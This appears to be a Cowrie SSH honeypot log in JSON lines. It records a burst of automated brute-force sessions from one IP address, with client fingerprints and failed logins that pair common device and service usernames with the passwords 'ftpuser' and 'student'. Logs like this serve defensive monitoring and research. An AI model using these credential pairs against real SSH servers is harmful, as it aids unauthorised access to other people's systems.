{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":38782,"dst_ip":"1.2.3.4","dst_port":22,"session":"54d7aae4326d","protocol":"ssh","message":"New connection: 87.120.191.13:38782 (1.2.3.4:22) [session: 54d7aae4326d]","sensor":"my-vps","timestamp":"2025-08-26T01:53:32.080709Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:32.081396Z","src_ip":"87.120.191.13","session":"54d7aae4326d"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:32.099020Z","src_ip":"87.120.191.13","session":"925b49abf457"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:32.102840Z","src_ip":"87.120.191.13","session":"54d7aae4326d"}
{"eventid":"cowrie.login.failed","username":"noc","password":"ftpuser","message":"login attempt [noc/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:32.113458Z","src_ip":"87.120.191.13","session":"db9a105177a0"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ftpuser","message":"login attempt [ubnt/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:32.116633Z","src_ip":"87.120.191.13","session":"4fad171cdf5a"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":38794,"dst_ip":"1.2.3.4","dst_port":22,"session":"3381a61f753f","protocol":"ssh","message":"New connection: 87.120.191.13:38794 (1.2.3.4:22) [session: 3381a61f753f]","sensor":"my-vps","timestamp":"2025-08-26T01:53:32.118330Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:32.119067Z","src_ip":"87.120.191.13","session":"3381a61f753f"}
{"eventid":"cowrie.login.failed","username":"student","password":"ftpuser","message":"login attempt [student/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:32.129697Z","src_ip":"87.120.191.13","session":"fbbaac36f911"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:32.130568Z","src_ip":"87.120.191.13","session":"023acf85b566"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ftpuser","message":"login attempt [ftpuser/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:32.134301Z","src_ip":"87.120.191.13","session":"06100a9e5666"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:32.138106Z","src_ip":"87.120.191.13","session":"3381a61f753f"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":38798,"dst_ip":"1.2.3.4","dst_port":22,"session":"f596fd61e5fa","protocol":"ssh","message":"New connection: 87.120.191.13:38798 (1.2.3.4:22) [session: f596fd61e5fa]","sensor":"my-vps","timestamp":"2025-08-26T01:53:32.149152Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:32.149897Z","src_ip":"87.120.191.13","session":"f596fd61e5fa"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ftpuser","message":"login attempt [ftpuser/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:32.167384Z","src_ip":"87.120.191.13","session":"54d7aae4326d"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:32.169652Z","src_ip":"87.120.191.13","session":"f596fd61e5fa"}
{"eventid":"cowrie.login.failed","username":"admin","password":"ftpuser","message":"login attempt [admin/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:32.222552Z","src_ip":"87.120.191.13","session":"3381a61f753f"}
{"eventid":"cowrie.login.failed","username":"pi","password":"ftpuser","message":"login attempt [pi/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:32.231102Z","src_ip":"87.120.191.13","session":"f596fd61e5fa"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:33.135754Z","src_ip":"87.120.191.13","session":"db9a105177a0"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:33.137810Z","src_ip":"87.120.191.13","session":"4fad171cdf5a"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":38802,"dst_ip":"1.2.3.4","dst_port":22,"session":"c5aef1afb90e","protocol":"ssh","message":"New connection: 87.120.191.13:38802 (1.2.3.4:22) [session: c5aef1afb90e]","sensor":"my-vps","timestamp":"2025-08-26T01:53:33.154842Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:33.155640Z","src_ip":"87.120.191.13","session":"c5aef1afb90e"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:33.156318Z","src_ip":"87.120.191.13","session":"fbbaac36f911"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":38804,"dst_ip":"1.2.3.4","dst_port":22,"session":"39bcadfc2778","protocol":"ssh","message":"New connection: 87.120.191.13:38804 (1.2.3.4:22) [session: 39bcadfc2778]","sensor":"my-vps","timestamp":"2025-08-26T01:53:33.157086Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:33.157785Z","src_ip":"87.120.191.13","session":"39bcadfc2778"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":38810,"dst_ip":"1.2.3.4","dst_port":22,"session":"51bdcee9a50d","protocol":"ssh","message":"New connection: 87.120.191.13:38810 (1.2.3.4:22) [session: 51bdcee9a50d]","sensor":"my-vps","timestamp":"2025-08-26T01:53:33.175867Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":38826,"dst_ip":"1.2.3.4","dst_port":22,"session":"c9f177b3fa49","protocol":"ssh","message":"New connection: 87.120.191.13:38826 (1.2.3.4:22) [session: c9f177b3fa49]","sensor":"my-vps","timestamp":"2025-08-26T01:53:33.176927Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:33.177619Z","src_ip":"87.120.191.13","session":"51bdcee9a50d"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:33.178355Z","src_ip":"87.120.191.13","session":"c5aef1afb90e"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:33.180236Z","src_ip":"87.120.191.13","session":"c9f177b3fa49"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:33.181201Z","src_ip":"87.120.191.13","session":"39bcadfc2778"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:33.190738Z","src_ip":"87.120.191.13","session":"54d7aae4326d"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:33.197419Z","src_ip":"87.120.191.13","session":"51bdcee9a50d"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:33.200310Z","src_ip":"87.120.191.13","session":"c9f177b3fa49"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":38834,"dst_ip":"1.2.3.4","dst_port":22,"session":"4a21adf47564","protocol":"ssh","message":"New connection: 87.120.191.13:38834 (1.2.3.4:22) [session: 4a21adf47564]","sensor":"my-vps","timestamp":"2025-08-26T01:53:33.210257Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:33.211164Z","src_ip":"87.120.191.13","session":"4a21adf47564"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:33.230303Z","src_ip":"87.120.191.13","session":"4a21adf47564"}
{"eventid":"cowrie.login.failed","username":"noc","password":"student","message":"login attempt [noc/student] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:33.242202Z","src_ip":"87.120.191.13","session":"c5aef1afb90e"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"student","message":"login attempt [ubnt/student] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:33.244310Z","src_ip":"87.120.191.13","session":"39bcadfc2778"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:33.245375Z","src_ip":"87.120.191.13","session":"3381a61f753f"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:33.253365Z","src_ip":"87.120.191.13","session":"f596fd61e5fa"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"student","message":"login attempt [ftpuser/student] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:33.260823Z","src_ip":"87.120.191.13","session":"51bdcee9a50d"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":54886,"dst_ip":"1.2.3.4","dst_port":22,"session":"9d079a227ae2","protocol":"ssh","message":"New connection: 87.120.191.13:54886 (1.2.3.4:22) [session: 9d079a227ae2]","sensor":"my-vps","timestamp":"2025-08-26T01:53:33.263085Z"}
{"eventid":"cowrie.login.failed","username":"student","password":"student","message":"login attempt [student/student] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:33.264662Z","src_ip":"87.120.191.13","session":"c9f177b3fa49"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:33.265317Z","src_ip":"87.120.191.13","session":"9d079a227ae2"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":54894,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b1d87d0d38c","protocol":"ssh","message":"New connection: 87.120.191.13:54894 (1.2.3.4:22) [session: 9b1d87d0d38c]","sensor":"my-vps","timestamp":"2025-08-26T01:53:33.277846Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:33.278915Z","src_ip":"87.120.191.13","session":"9b1d87d0d38c"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:33.283676Z","src_ip":"87.120.191.13","session":"9d079a227ae2"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:33.299973Z","src_ip":"87.120.191.13","session":"9b1d87d0d38c"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"student","message":"login attempt [ftpuser/student] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:33.312647Z","src_ip":"87.120.191.13","session":"4a21adf47564"}
{"eventid":"cowrie.login.failed","username":"admin","password":"student","message":"login attempt [admin/student] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:33.366367Z","src_ip":"87.120.191.13","session":"9d079a227ae2"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:33.383066Z","src_ip":"87.120.191.13","session":"06100a9e5666"}
